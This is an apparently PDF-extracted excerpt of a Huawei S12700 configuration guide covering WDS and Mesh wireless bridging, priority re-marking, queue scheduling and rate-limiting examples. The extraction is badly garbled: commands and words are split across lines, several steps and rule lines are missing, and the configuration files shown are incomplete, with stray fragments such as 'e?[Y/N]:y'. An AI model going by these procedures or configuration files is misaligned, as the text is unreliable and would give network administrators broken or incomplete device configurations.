[AC-wlan-group-radio-wds-root1/1] wds-whitelist-profile wds-list1
[AC-wlan-group-radio-wds-root2/1] wds-whitelist-profile wds-list2
Step 5 Configure the wired port profile used by the wired interface of AP_4 and set the wired
interface mode to endpoint. In this example, the PVID of the wired interface is set to VLAN
101 and the wired interface is added to VLAN 101 in tagged mode.
[AC-wlan-view] wired-port-profile name wired-port
[AC-wlan-wired-port-wired-port] mode endpoint
[AC-wlan-wired-port-wired-port] vlan pvid 101
[AC-wlan-wired-port-wired-port] vlan tagged 101
[AC-wlan-wired-port-wired-port] quit
Step 6 Bind required profiles to the AP groups to make WDS services take effect.
# Configure the AP group wds-root1 and bind the WDS profile wds-net1 to the group.
[AC-wlan-ap-group-wds-root1] wds-profile wds-net1 radio 1
# Configure the AP group wds-root2 and bind the WDS profile wds-net2 to the group.
[AC-wlan-ap-group-wds-root2] wds-profile wds-net2 radio 1
# Configure the AP group wds-leaf1 and bind the WDS profile wds-net3 to the group.


[AC-wlan-ap-group-wds-leaf1] wds-profile wds-net3 radio 1
# Configure the AP group wds-leaf2, and bind the WDS profile wds-net3 and wired port
profile wired-port to the group.
[AC-wlan-ap-group-wds-leaf2] wds-profile wds-net3 radio 1
[AC-wlan-ap-group-wds-leaf2] wired-port-profile wired-port gigabitethernet 0


Step 8 Verify the WDS service configuration.
# After the configuration is complete, run the display ap all command to check whether WDS
nodes go online successfully. If State displays as nor, APs have gone online successfully.
nor : normal [4]
--------------------------------------------------------------------------------
------
ID MAC Name Group IP Type State STA Upt
ime
--------------------------------------------------------------------------------
------
1 60de-4474-9640 AP_1 wds-root1 10.23.100.250 AP6010DN-AGN nor 0
20M:16S
4 60de-4476-e360 AP_4 wds-leaf2 10.23.100.251 AP6010DN-AGN nor 0
17S
2 dcd2-fc04-b500 AP_2 wds-leaf1 10.23.100.253 AP6010DN-AGN nor 0
3M:55S
3 dcd2-fcf6-76a0 AP_3 wds-root2 10.23.100.252 AP6010DN-AGN nor 0
2M:55S
--------------------------------------------------------------------------------
----
Total: 4
Run the display wlan wds link all command to check information about the WDS links.
[AC-wlan-view] display wlan wds link all
Rf : radio ID Dis : coverage distance(100m)
Ch : channel Per : drop percent(%)
TSNR : total SNR(dB) P- : peer
WDS : WDS mode Re : retry ratio(%)
RSSI : RSSI(dBm) MaxR : max RSSI(dBm)
--------------------------------------------------------------------------------
-----------------
APName P-APName Rf Dis Ch WDS P-Status RSSI MaxR Per Re TS
NR SNR(Ch0~2:dB)
--------------------------------------------------------------------------------
-----------------
AP_1 AP_2 1 3 157 root normal -44 -40 0 3 50
45/49/-
AP_2 AP_1 1 3 157 leaf normal -38 -36 0 49 57
36/31/57
AP_3 AP_4 1 3 149 root normal -11 -7 0 1 83
81/80/-
AP_4 AP_3 1 3 149 leaf normal -4 -4 0 0 91
90/85/-
--------------------------------------------------------------------------------

-----------------
Total: 4
----End
Configuration Files
l Switch_A configuration file
#
sysname Switch_A
#
#
dhcp enable
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
#
#
#
#
return
l Switch_B configuration file

#
sysname Switch_B
#
#
#
#
return
l Switch_C configuration file

#
sysname Switch_C
#
#
#
#
return

#
sysname AC
#
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
#
#
wlan
security-profile name wds-

sec
security wpa2 psk pass-phrase %^%#n}5+DgC3wLB.hJ34j5;*QMv<8"9#{Bq@ghBI3L9K%^
%# aes
wds-whitelist-profile name wds-
list1
peer-ap mac dcd2-fc04-
b500
wds-whitelist-profile name wds-
list2
peer-ap mac 60de-4476-
e360
wds-profile name wds-
net1
security-profile wds-
sec
vlan tagged
101
wds-name wds-
net
wds-mode
root
net2
sec
vlan tagged
101
wds-name wds-
net
wds-mode
root
net3
sec
vlan tagged
101
wds-name wds-
net
regulatory-domain-profile name
domain1
wired-port-profile name wired-
port
mode
endpoint
vlan pvid
101
vlan tagged
101

ap-group name wds-

leaf1
regulatory-domain-profile
domain1
radio 1
wds-profile wds-net3
channel 40mhz-plus
157
coverage distance 4
ap-group name wds-
leaf2
wired-port-profile wired-port gigabitethernet
0
domain1
radio
1
wds-profile wds-
net3
channel 40mhz-plus
149
coverage distance 4
ap-group name wds-
root1
domain1
radio
1
wds-profile wds-
net1
wds-whitelist-profile wds-
list1
channel 40mhz-plus
157
coverage distance 4
ap-group name wds-
root2
domain1
radio
1
wds-profile wds-
net2
wds-whitelist-profile wds-
list2
channel 40mhz-plus
149
coverage distance
4
ap-id 1 type-id 19 ap-mac 60de-4474-9640 ap-sn
210235554710CB000042
ap-name
AP_1
ap-group wds-
root1
ap-id 2 type-id 19 ap-mac dcd2-fc04-b500 ap-sn
210235555310CC000094
ap-name
AP_2
ap-group wds-
leaf1
ap-id 3 type-id 19 ap-mac dcd2-fcf6-76a0 ap-sn
210235419610D2000097
ap-name
AP_3
ap-group wds-
root2
ap-id 4 type-id 19 ap-mac 60de-4476-e360 ap-sn
210235557610DB000046

ap-name
AP_4
ap-group wds-
leaf2
#
return

Mesh Technology
Mesh Overview
Mesh is short for wireless Mesh network (WMN), which is constituted by APs wirelessly
connected in a Mesh topology.
On a traditional WLAN network, APs connect to an AC through wired uplinks. Wired

network deployment is costly in areas where network cables are difficult to deploy, for
example, tunnels and docks. In these areas, Mesh technology can be used to deploy a wireless
network quickly. A Mesh network supports dynamic, automatic configuration, allowing you
to add or remove Mesh nodes flexibly. In addition, Mesh technology supports link redundancy
between APs so that the failure of a single node will not affect the entire network. This
improves network robustness.
A Mesh network has two types of nodes:

l Mesh portal point (MPP): a Mesh point that connects the Mesh network to other types of
networks. This node provides the portal function to allow Mesh nodes to communicate
with external networks.
l Mesh point (MP): a Mesh-capable node that uses IEEE 802.11 MAC and physical layer
protocols for wireless communication. This node supports automatic topology discovery,
automatic route discovery, and data packet forwarding. MPs can provide both Mesh
service and user access service.
Configuration Notes
support the Mesh function.
with each other.
NOTE

l It is recommended that you deploy no more than 40 Mesh nodes on a Mesh network.

are
Versi
on
V200 S12700 V200R007C00:

R009C AP6010SN-GN, AP6010DN-AGN, AP6510DN-
00 AGN, AP6610DN-AGN, AP7110SN-GN,
AP6150DN, AP7050DE, AP7050DN-E,
AP4030TN, AP4050DN-E, AP4050DN-HD
V200R006C20:
V200R006C10:
AP8130DN, AP8030DN, AP4030DN, AP4130DN
An enterprise has three areas: Area A, Area B, and Area C. Restricted by geographical
locations, the AP in Area A can be deployed in wired mode, but wired deployment of APs is

costly in Area B and Area C. The enterprise requires that APs be deployed in Area B and
Area C at low cost.
As shown in Figure 16-13, a Mesh network is deployed to connect AP_2 and AP_3 to AP_1
through Mesh links, which can reduce network construction cost.
Figure 16-13 Mesh networking diagram
Data Plan
Before configuring the Mesh service, determine the types and MAC addresses of the APs
used as Mesh nodes. The following table provides the data plan for this example.
NOTE
AP Type MAC
AP_1 AP6010DN-AGN 60de-4474-9640
AP_2 AP6010DN-AGN 60de-4476-e360
AP_3 AP6010DN-AGN dcd2-fcf6-76a0
Item Data
Manageme VLAN 100

nt VLAN
for APs

Item Data
DHCP The AC functions as a DHCP server to allocate IP addresses to APs.

server Address pool: 10.23.100.2-10.23.100.254/24

interface
Mesh Name: mesh-net

profile
name
Mesh role l AP_1: Mesh-portal (MPP)

l AP_2: Mesh-node (MP)
l AP_3: Mesh-node (MP)
Mesh ID Name: mesh-net
Mesh Name: mesh-list

whitelist
AP system Name: mesh-sys

profile
Radio used Radio 1:

by Mesh l Bandwidth: 40mhz-plus
services
l Channel: 157
Security l Name: mesh-sec

l Password type: PASS-PHRASE
AP group l mesh-mpp: AP_1

l mesh-mp: AP_2 and AP_3
1. Configure network connectivity and enable the AP (MPP) in Area A to go online on the
AC in wired mode.
2. Configure Mesh services to enable APs (MPs) in Area B and Area C to go online on the
AC through Mesh links.
Procedure
Step 1 Configure the AC to communicate with AP_1.
# Configure access switch Switch_A. Add GE0/0/1 to VLAN 100 (management VLAN) and
set the PVID of the interface to VLAN 100. Configure GE0/0/1 and GE0/0/2 to allow packets
from VLAN 100 to pass through.

[Switch_A] vlan batch 100
[Switch_A-GigabitEthernet0/0/1] port trunk pvid vlan 100
[Switch_A-GigabitEthernet0/0/1] port-isolate enable
# Configure aggregation switch Switch_B. Configure GE0/0/1 and GE0/0/2 to allow packets
from VLAN 100 to pass through.
[Switch_B] vlan batch 100
# Configure GE1/0/1 that connects the AC to the aggregation switch to allow packets from
VLAN 100 to pass through.
[HUAWEI] sysname AC
[AC] vlan batch 100
Step 2 Configure the AC as a DHCP server to allocate IP addresses to APs.

[AC] dhcp enable
[AC-Vlanif100] quit
Step 3 Configure the AP groups, country code, and AC's source interface.
# Create AP groups for MPPs and MPs respectively and add APs that require the same
configuration to the same group.
[AC] wlan
[AC-wlan-view] ap-group name mesh-mpp //Configure an AP group for MPPs.
[AC-wlan-ap-group-mesh-mpp] quit
[AC-wlan-view] ap-group name mesh-mp //Configure an AP group for MPs.
[AC-wlan-ap-group-mesh-mp] quit
[AC-wlan-view] ap-group name mesh-mpp
[AC-wlan-ap-group-mesh-mpp] regulatory-domain-profile domain1

e?[Y/N]:y
[AC-wlan-view] ap-group name mesh-mp
[AC-wlan-ap-group-mesh-mp] regulatory-domain-profile domain1
e?[Y/N]:y
[AC-wlan-view] quit

# Add AP_1 to the AP group mesh-mpp and AP_2 and AP_3 to the AP group mesh-mp.
NOTE
[AC] wlan
[AC-wlan-ap-1] ap-group mesh-mpp
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] ap-group mesh-mp
[AC-wlan-ap-2] quit
[AC-wlan-view] ap-id 3 ap-mac dcd2-fcf6-76a0
[AC-wlan-ap-3] ap-group mesh-mp
[AC-wlan-ap-3] quit
Step 4 Configure Mesh parameters.
# Configure radio parameters for Mesh nodes. Radio 1 of the AP6010DN-AGN is used as an
example. coverage distance indicates the radio coverage distance parameter, which is 3 (unit:
100 m) by default. In this example, the radio coverage distance parameter is set to 4. You can
configure the parameter according to actual situations.
[AC-wlan-ap-group-mesh-mpp] radio 1
[AC-wlan-group-radio-mesh-mpp/1] channel 40mhz-plus 157 //Configure the
channel and bandwidth for Mesh links. All Mesh links on the same Mesh network
must be configured with the same channel and bandwidth.
[AC-wlan-group-radio-mesh-mpp/1] coverage distance 4 //After the radio
coverage distance parameter is configured based on distances between APs, the APs
will automatically adjust the values of slottime, acktimeout, and ctstimeout
based on the configured distance parameter.
[AC-wlan-group-radio-mesh-mpp/1] quit
[AC-wlan-ap-group-mesh-mp] radio 1
[AC-wlan-group-radio-mesh-mp/1] channel 40mhz-plus 157
[AC-wlan-group-radio-mesh-mp/1] coverage distance 4

[AC-wlan-group-radio-mesh-mp/1] quit
# Set parameters for the APs' wired interfaces. This example assumes that the service VLAN
is VLAN 101. Wired interfaces of all Mesh nodes are therefore added to VLAN 101 in tagged
mode.
[AC-wlan-view] wired-port-profile name wired-port
[AC-wlan-wired-port-wired-port] vlan tagged 101
[AC-wlan-wired-port-wired-port] quit
# Configure the security profile mesh-sec used by Mesh links. The Mesh network supports
only the security policy WPA2+PSK+AES.
[AC-wlan-view] security-profile name mesh-sec
[AC-wlan-sec-prof-mesh-sec] security wpa2 psk pass-phrase a1234567 aes
[AC-wlan-sec-prof-mesh-sec] quit
# Configure a Mesh whitelist.

[AC-wlan-view] mesh-whitelist-profile name mesh-list
[AC-wlan-mesh-whitelist-mesh-list] peer-ap mac 60de-4474-9640
[AC-wlan-mesh-whitelist-mesh-list] peer-ap mac 60de-4476-e360
[AC-wlan-mesh-whitelist-mesh-list] peer-ap mac dcd2-fcf6-76a0
[AC-wlan-mesh-whitelist-mesh-list] quit
# Configure Mesh roles. Set the Mesh role of AP_1 to mesh-portal. AP_2 and AP_3 use the
default Mesh role mesh-node. Mesh roles are configured through the AP system profile.
[AC-wlan-view] ap-system-profile name mesh-sys
[AC-wlan-ap-system-prof-mesh-sys] mesh-role mesh-portal
[AC-wlan-ap-system-prof-mesh-sys] quit
# Configure a Mesh profile. Set the Mesh network ID to mesh-net, aging time of Mesh links
to 30s, and bind the security profile and Mesh whitelist to the Mesh profile.
[AC-wlan-view] mesh-profile name mesh-net
[AC-wlan-mesh-prof-mesh-net] mesh-id mesh-net //Only Mesh VAPs with the
same Mesh network ID can set up Mesh links.
[AC-wlan-mesh-prof-mesh-net] link-aging-time 30
[AC-wlan-mesh-prof-mesh-net] security-profile mesh-sec
[AC-wlan-mesh-prof-mesh-net] quit
# Bind the Mesh whitelist profile to the AP radio.

[AC-wlan-ap-group-mesh-mpp] radio 1
[AC-wlan-group-radio-mesh-mpp/1] mesh-whitelist-profile mesh-list
[AC-wlan-group-radio-mesh-mpp/1] quit
[AC-wlan-ap-group-mesh-mp] radio 1
[AC-wlan-group-radio-mesh-mp/1] mesh-whitelist-profile mesh-list
[AC-wlan-group-radio-mesh-mp/1] quit
Step 5 Bind required profiles to the AP groups to make Mesh services take effect.
# Bind the AP wired port profile wired-port to AP groups mesh-mpp and mesh-mp to make
AP wired port parameters take effect on Mesh nodes. This example assumes that all APs
connect to Switch_A through GE0.
[AC-wlan-ap-group-mesh-mpp] wired-port-profile wired-port gigabitethernet 0
[AC-wlan-ap-group-mesh-mp] wired-port-profile wired-port gigabitethernet 0

# Bind the AP system profile mesh-sys to the AP group mesh-mpp to make the MPP role
take effect on AP_1.
[AC-wlan-ap-group-mesh-mpp] ap-system-profile mesh-sys
# Bind the Mesh profile mesh-net to AP groups mesh-mpp and mesh-mp to make the Mesh
services take effect.
[AC-wlan-ap-group-mesh-mpp] mesh-profile mesh-net radio 1
[AC-wlan-ap-group-mesh-mp] mesh-profile mesh-net radio 1

Step 7 Verify the Mesh service configuration.

# After the configuration is complete, run the display ap all command to check whether Mesh
nodes go online successfully. If State displays as nor, APs have gone online successfully.
nor : normal [3]
--------------------------------------------------------------------------------
----------
ID MAC Name Group IP Type State STA Upt
ime
--------------------------------------------------------------------------------
----------
1 60de-4474-9640 AP_1 mesh-mpp 10.23.100.254 AP6010DN-AGN nor 0
13M:45S
2 60de-4476-e360 AP_2 mesh-mp 10.23.100.251 AP6010DN-AGN nor 0
5M:22S
3 dcd2-fcf6-76a0 AP_3 mesh-mp 10.23.100.253 AP6010DN-AGN nor 0
4M:14S
--------------------------------------------------------------------------------
---
Total: 3
# After Mesh services take effect, run the display wlan mesh link all command to check
Mesh link information.
[AC-wlan-view] display wlan mesh link all
Rf : radio ID Dis : coverage distance(100m)
Ch : channel Per : drop percent(%)
TSNR : total SNR(dB) P- : peer
Mesh : Mesh mode Re : retry ratio(%)
RSSI : RSSI(dBm) MaxR : max RSSI(dBm)
--------------------------------------------------------------------------------
-----------------
APName P-APName Rf Dis Ch Mesh P-Status RSSI MaxR Per Re TS
NR SNR(Ch0~2:dB)
--------------------------------------------------------------------------------
-----------------
AP_1 AP_2 1 4 157 portal normal -30 -27 0 12 67
62/65/-
AP_1 AP_3 1 4 157 portal normal -26 -24 0 12 71
67/68/-
AP_3 AP_2 1 4 157 node normal -19 -3 0 5 77
66/76/-
AP_3 AP_1 1 4 157 node normal -32 -4 0 26 64
55/63/-

AP_2 AP_1 1 4 157 node normal -32 -4 0 12 64

62/61/-
AP_2 AP_3 1 4 157 node normal -14 -12 0 4 82
71/82/-
--------------------------------------------------------------------------------
-----------------
Total: 6
----End
Configuration Files
l Switch_A configuration file
#
sysname Switch_A
#
vlan batch 100
#
#
#
return
l Switch_B configuration file

#
sysname Switch_B
#
vlan batch 100
#
#
#
return
#
sysname AC
#
vlan batch 100
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
#
#
#
wlan
security-profile name mesh-sec
security wpa2 psk pass-phrase %^%#WXq~51G1^G;~|`C\G$v-`XoiIe4z$CNAM#@TeN^+%^
%#

aes
mesh-whitelist-profile name mesh-list
peer-ap mac 60de-4474-9640
peer-ap mac 60de-4476-e360
peer-ap mac dcd2-fcf6-76a0
mesh-profile name mesh-net
security-profile mesh-sec
mesh-id mesh-net
link-aging-time 30
ap-system-profile name mesh-sys
mesh-role mesh-portal
wired-port-profile name wired-port
vlan tagged 101
ap-group name mesh-mp
wired-port-profile wired-port gigabitethernet 0
radio 1
mesh-profile mesh-net
mesh-whitelist-profile mesh-list
channel 40mhz-plus 157
coverage distance 4
ap-group name mesh-mpp
ap-system-profile mesh-sys
wired-port-profile wired-port gigabitethernet 0
radio 1
mesh-profile mesh-net
mesh-whitelist-profile mesh-list
channel 40mhz-plus 157
coverage distance 4
ap-id 1 type-id 19 ap-mac 60de-4474-9640 ap-sn
210235554710CB000042
ap-name
AP_1
ap-group mesh-mpp
ap-id 2 type-id 19 ap-mac 60de-4476-e360 ap-sn
210235557610DB000046
ap-name
AP_2
ap-group mesh-mp
ap-id 3 type-id 19 ap-mac dcd2-fcf6-76a0 ap-sn
210235419610D2000097
ap-name
AP_3
ap-group mesh-mp
#
return

Typical Configuration Examples 17 Typical QoS Configuration
17 Typical QoS Configuration
About This Chapter
17.1 Example for Configuring Priority Re-marking and Queue Scheduling

17.2 Example for Configuring Interface-based Rate Limiting
17.3 Example for Configuring a Traffic Policy to Implement Rate Limiting
17.4 Example for Configuring Rate Limiting in a Specified Time Range
17.5 Example for Configuring Rate Limiting Based on VLAN IDs
17.6 Example for Configuring Traffic Shaping
17.7 Example for Configuring Congestion Avoidance and Congestion Management
17.8 Example for Configuring a Traffic Policy to Prevent Some Users from Accessing the
Internet at the Specified Time
17.9 Example for Configuring a Traffic Policy to Collect Statistics on Ping Packets
17.10 Example for Configuring a Traffic Policy to Implement Traffic Statistics
17.11 Example for Limiting Access Based on the Flow ID
17.12 Example for Configuring a Traffic Policy to Limit Access Between Network Segments
17.13 Example for Configuring HQoS

17.1 Example for Configuring Priority Re-marking and

Queue Scheduling
Overview of Priority Re-marking and Queue Scheduling
After packets enter the device, the device allocates or modifies packet priorities based on rules
and schedules services based on allocated or modified priorities.
Priority re-marking enables the device to re-mark packet priorities. You can manually set or
modify packet priorities to control packet scheduling and improve packet forwarding
capability of the device.
Configuration Notes

Product Product Model Software Version
S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE
As shown in Figure 17-1, a company has three services: data query, email processing, and file
transfer. The three services have different priorities. When HostA and HostB access servers of
the three services, data query, email processing, and file transfer need to be processed in
descending order of priority. Priority re-marking and queue scheduling can be configured on
the switch to meet the preceding requirement.

Figure 17-1 Networking of priority re-marking and queue scheduling
Internet Data server

192.168.1.10
HostA GE1/0/1 GE1/0/2
SwitchA Email server

192.168.1.11
HostB
FTP server
192.168.1.12
1. Configure traffic classifiers to classify packets based on servers' IP addresses.
2. Configure traffic behaviors and define priority re-marking.
3. Configure a traffic policy and bind the traffic policy to the traffic classifiers and traffic
behaviors, and apply the traffic policy to GE1/0/1 in the inbound direction to re-mark
priorities of incoming packets.
4. Configure PQ on GE1/0/2. PQ schedules packets in descending order of priority.
Procedure
Step 1 Configure ACLs to classify packets based on servers' IP addresses.
# Configure advanced ACL 3001 to classify packets with the destination IP address of
192.168.1.10.
[SwitchA] acl 3001
[SwitchA-acl-adv-3001] rule permit ip destination 192.168.1.10 0.0.0.0
192.168.1.11.
[SwitchA] acl 3002
192.168.1.12.

[SwitchA] acl 3003

Step 2 Configure traffic classifiers to classify packets based on destination IP addresses.

# Configure a traffic classifier named dbserver to match packets with the destination IP
address of 192.168.1.10.
[SwitchA] traffic classifier dbserver operator and
[SwitchA-classifier-dbserver] if-match acl 3001 //Configure the device to match
packets with the destination IP address of 192.168.1.10.
[SwitchA-classifier-dbserver] quit
# Configure a traffic classifier named mailserver to match packets with the destination IP
address of 192.168.1.11.
[SwitchA] traffic classifier mailserver operator and
[SwitchA-classifier-mailserver] if-match acl 3002 //Configure the device to
match packets with the destination IP address of 192.168.1.11.
[SwitchA-classifier-mailserver] quit
# Configure a traffic classifier named ftpserver to match packets with the destination IP
address of 192.168.1.12.
[SwitchA] traffic classifier ftpserver operator and
[SwitchA-classifier-ftpserver] if-match acl 3003 //Configure the device to match
packets with the destination IP address of 192.168.1.12.
[SwitchA-classifier-ftpserver] quit
Step 3 Configure traffic behaviors and define priority re-marking.

# Configure a traffic behavior named dbserver to re-mark packets destined for 192.168.1.10
with 4.
[SwitchA] traffic behavior dbserver
[SwitchA-behavior-dbserver] remark local-precedence 4 //Configure the device to
re-mark the local priority of packets destined for 192.168.1.10 with 4.
[SwitchA-behavior-dbserver] quit
# Configure a traffic behavior named mailserver to re-mark packets destined for 192.168.1.11
with 3.
[SwitchA] traffic behavior mailserver
[SwitchA-behavior-mailserver] remark local-precedence 3 //Configure the device
to re-mark the local priority of packets destined for 192.168.1.11 with 3.
[SwitchA-behavior-mailserver] quit
# Configure a traffic behavior named ftpserver to re-mark packets destined for 192.168.1.12
with 2.
[SwitchA] traffic behavior ftpserver
[SwitchA-behavior-ftpserver] remark local-precedence 2 //Configure the device to
re-mark the local priority of packets destined for 192.168.1.12 with 2.
[SwitchA-behavior-ftpserver] quit
Step 4 Configure a traffic policy and bind the traffic classifiers and traffic behaviors to the traffic
policy.
[SwitchA] traffic policy policy1
[SwitchA-trafficpolicy-policy1] classifier dbserver behavior dbserver
[SwitchA-trafficpolicy-policy1] classifier mailserver behavior mailserver
[SwitchA-trafficpolicy-policy1] classifier ftpserver behavior ftpserver
[SwitchA-trafficpolicy-policy1] quit
Step 5 Apply the traffic policy to GE1/0/1 to re-mark priorities of incoming packets.
[SwitchA-GigabitEthernet1/0/1] traffic-policy policy1 inbound //Apply the

traffic policy in the inbound direction.

Step 6 Configure PQ on GE1/0/2. PQ schedules packets in descending order of priority.

[SwitchA-GigabitEthernet1/0/2] qos pq //Configure PQ scheduling on the
interface. In PQ mode, the device first schedules high-priority packets.

[SwitchA] display traffic policy user-defined
Policy: policy1
Classifier: dbserver
Operator: AND
Behavior: dbserver
Remark:
Remark local-precedence af4
Classifier: mailserver
Operator: AND
Behavior: mailserver
Remark:
Classifier: ftpserver
Operator: AND
Behavior: ftpserver
Remark:
# Check the traffic policy record. The traffic policy has been successfully applied to GE1/0/1.
[SwitchA] display traffic-policy applied-record policy1
-------------------------------------------------
Policy Name: policy1
Policy Index: 0
Classifier:dbserver Behavior:dbserver
Classifier:mailserver Behavior:mailserver
Classifier:ftpserver Behavior:ftpserver
-------------------------------------------------
traffic-policy policy1 inbound
slot 1 : success
-------------------------------------------------
Policy total applied times: 1.
----End
Configuration Files
#
sysname SwitchA
#
acl number 3001
acl number 3002
acl number 3003
#
traffic classifier dbserver operator and
if-match acl 3001

traffic classifier ftpserver operator and

if-match acl 3003
traffic classifier mailserver operator and
if-match acl 3002
#
traffic behavior dbserver
remark local-precedence af4
traffic behavior ftpserver
traffic behavior mailserver
#
traffic policy policy1 match-order config
classifier dbserver behavior dbserver
classifier mailserver behavior mailserver
classifier ftpserver behavior ftpserver
#
traffic-policy policy1 inbound
#
qos pq
#
return
17.2 Example for Configuring Interface-based Rate

Limiting
Overview of Interface-based Rate Limiting
Interface-based rate limiting limits the rate of all packets sent or received on an interface
without differentiating the packet type. The interface enabled with this function can be
assigned fixed bandwidth, the control mode is singular, and interface-based rate limiting is
easy to configure.
Interface-based rate limiting in the inbound and outbound directions can be configured
simultaneously or separately.
Configuration Notes

S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE

As shown in Figure 17-2, the Switch connects to the router through GE2/0/1, enterprise
departments 1 and 2 are connected to the Switch through GE1/0/1 and GE1/0/2 and access the
Internet through the Switch and router.
Only data services are transmitted on the network, so services do not need to be differentiated.
With finite network bandwidth, bandwidth of each department in the enterprise needs to be
limited. Enterprise department 1 requires the CIR of 8 Mbit/s and PIR of 10 Mbit/s, and
enterprise department 2 requires the CIR of 5 Mbit/s and PIR of 8 Mbit/s.
Figure 17-2 Networking of interface-based rate limiting
N e tw o rk
R o u te r
G E 2 /0 /1 T ra ffic
d ire ctio n
G E 1 /0 /1 G E 1 /0 /2
S w itc h
S w itch A S w itch B
D e p a rtm e n t 1 D e p a rtm e n t 2
1. Create VLANs and configure interfaces so that users can access the Internet through the
Switch.
2. Create different CAR profiles and configure the CIRs and PIRs in the CAR profiles, and
apply the CAR profiles to GE1/0/1 and GE1/0/2 on the Switch in the inbound direction
to limit the rate of packets from different enterprise departments.
Procedure
Step 1 Create VLANs and configure interfaces of the Switch.
# Configure GE1/0/1, GE1/0/2, and GE2/0/1 as trunk interfaces, and add GE1/0/1 to VLAN
100, GE1/0/2 to VLAN 200, and GE2/0/1 to VLAN 100 and VLAN 200.
[Switch-GigabitEthernet1/0/1] port link-type trunk //Set the link type of the
interface to trunk. The defalt link type of the interface is not trunk.


Step 2 Configure CAR profiles.

# Create CAR profiles car1 and car2 on the Switch to limit the rate of traffic from enterprise
departments 1 and 2.
[Switch] qos car car1 cir 8192 pir 10240 //Set the CIR in the CAR profile car1
to 8 Mbit/s.
[Switch] qos car car2 cir 5120 pir 8192 //Set the CIR in the CAR profile car2 to
5 Mbit/s.
Step 3 Apply the CAR profiles.

# Apply the CAR profiles to GE1/0/1 and GE1/0/2 on the Switch in the inbound direction
respectively to limit the rate of traffic from enterprise departments 1 and 2.
[Switch-GigabitEthernet1/0/1] qos car inbound car1
[Switch-GigabitEthernet1/0/2] qos car inbound car2
[Switch] quit

# Check the CAR profile configuration.
<Switch> display qos car all
----------------------------------------------------------------
CAR Name : car1
CAR Index : 0
car cir 8192 (Kbps) pir 10240 (Kbps) cbs 1024000 (byte) pbs 1280000 (byte)
----------------------------------------------------------------
CAR Name : car2
CAR Index : 1
car cir 5120 (Kbps) pir 8192 (Kbps) cbs 640000 (byte) pbs 1024000 (byte)
# Send traffic at rates of 6000 kbit/s, 9000 kbit/s, and 11000 kbit/s to GE1/0/1 and GE1/0/2,
and run the display qos car statistics command to view traffic statistics. When packets are
sent to GE1/0/1 and GE1/0/2 at a rate of 6000 kbit/s, all packets are forwarded. When packets
are sent to GE1/0/1 and GE1/0/2 at a rate of 9000 kbit/s, all packets on GE1/0/1 are forwarded
and some packets on GE1/0/2 are discarded. When packets are sent to GE1/0/1 and GE1/0/2
at a rate of 11000 kbit/s, some packets on both GE1/0/1 and GE1/0/2 are discarded.
----End
Configuration Files
#
sysname Switch
#
vlan batch 100 200
#

qos car car1 cir 8192 pir 10240 cbs 1024000 pbs 1280000
qos car car2 cir 5120 pir 8192 cbs 640000 pbs 1024000
#
qos car inbound car1
#
qos car inbound car2
#
#
return
Video
Configure Interface-based Rate Limiting
17.3 Example for Configuring a Traffic Policy to

Implement Rate Limiting
Overview
In a traffic policy, access control list (ACL) rules can be used to classify packets. ACLs fall
into basic, advanced, and Layer 2 ACLs. A basic ACL defines rules based on the source IP
address, fragment flag, and time range. Traffic policing is configured in the traffic behavior to
limit the rate of matched packets.
An Access Control List (ACL) consists of one or a set of rules. The rules determine whether
packets match conditions such as source addresses, destination addresses, and port numbers of
packets.
Configuration Notes

S12700 S12708 and S12712 V200R005C00, V200R006C00,

V200R007C00, V200R007C20,
V200R008C00, V200R009C00
S12704 V200R008C00, V200R009C00
NOTE

As shown in Figure 17-3, the company has two departments that belong to VLAN 10 and
VLAN 20, respectively. Some servers are deployed in VLAN 10 and high bandwidth is
required; employees need to access the Internet in VLAN 20 only and there are no high
requirements of bandwidth. The company purchases the leased line of 10 Mbit/s from a
carrier. The company requires the bandwidth for Internet access of employees in VLAN 20 in
the range of 2 Mbit/s to 4 Mbit/s, and traffic of which the rate exceeds 4 Mbit/s is discarded.
Figure 17-3 Configuring a traffic policy to implement rate limiting

VLAN 10
192.168.1.0/24 GE1/0/1
10.1.20.1/24
GE1/0/3 GE1/0/2
Network
GE0/0/1
VLAN 20 GE1/0/2
192.168.2.0/24
Device Interface VLAN Layer 3 IP Address

Interface
SwitchA GigabitEthernet VLAN 10 - -

1/0/1
GigabitEthernet VLAN 20 - -
1/0/2
GigabitEthernet VLAN 10 and - -

1/0/3 VLAN 20
Switch GigabitEthernet VLAN 10 and VLANIF 10 VLANIF 10:

1/0/1 VLAN 20 and VLANIF 192.168.1.1/24
20 VLANIF 20:
192.168.2.1/24
GigabitEthernet VLAN 30 VLANIF 30 10.1.20.2/24

1/0/2
1. Create VLANs, and configure interfaces and a routing protocol to implement
interworking between the company and external network.
2. Configure an ACL on the Switch to match traffic from a specified network segment.
3. Configure a traffic classifier on the Switch to classify packets based on the ACL.
4. Configure a traffic behavior on the Switch to limit the rate of matched traffic.

5. Configure a traffic policy on the Switch, bind the traffic policy to the traffic classifier
and traffic behavior, and apply the traffic policy to GE1/0/1 connected to SwitchA in the
inbound direction to implement rate limiting.
Procedure
Step 1 Create VLANs, and configure interfaces and a routing protocol.

[Switch] vlan batch 10 20 30 //Create VLAN 10, VLAN 20, and VLAN 30.
interface to trunk.
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 //Add the
[Switch-GigabitEthernet1/0/2] port link-type access //Set the link type of the
interface to access.
30.
[Switch] interface vlanif 10 //Create a VLANIF interface.
[Switch-Vlanif10] ip address 192.168.1.1 255.255.255.0 //Configure an IP address
for the VLANIF interface. The IP address is the gateway address of network
segment 192.168.1.0/24.
for the VLANIF interface to connect to the router.
[Switch] ip route-static 0.0.0.0 0 10.1.20.1 //Configure a static route pointing
to the external network to implement interworking.
[SwitchA-GigabitEthernet1/0/1] port link-type access //Set the link type of the
10.
[SwitchA-GigabitEthernet1/0/3] port link-type trunk //Set the link type of the
interface to trunk.
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 10 20 //Add the
# Configure the router.
Configure the IP address of 10.1.20.1/24 for the interface of the router connected to the
switch.

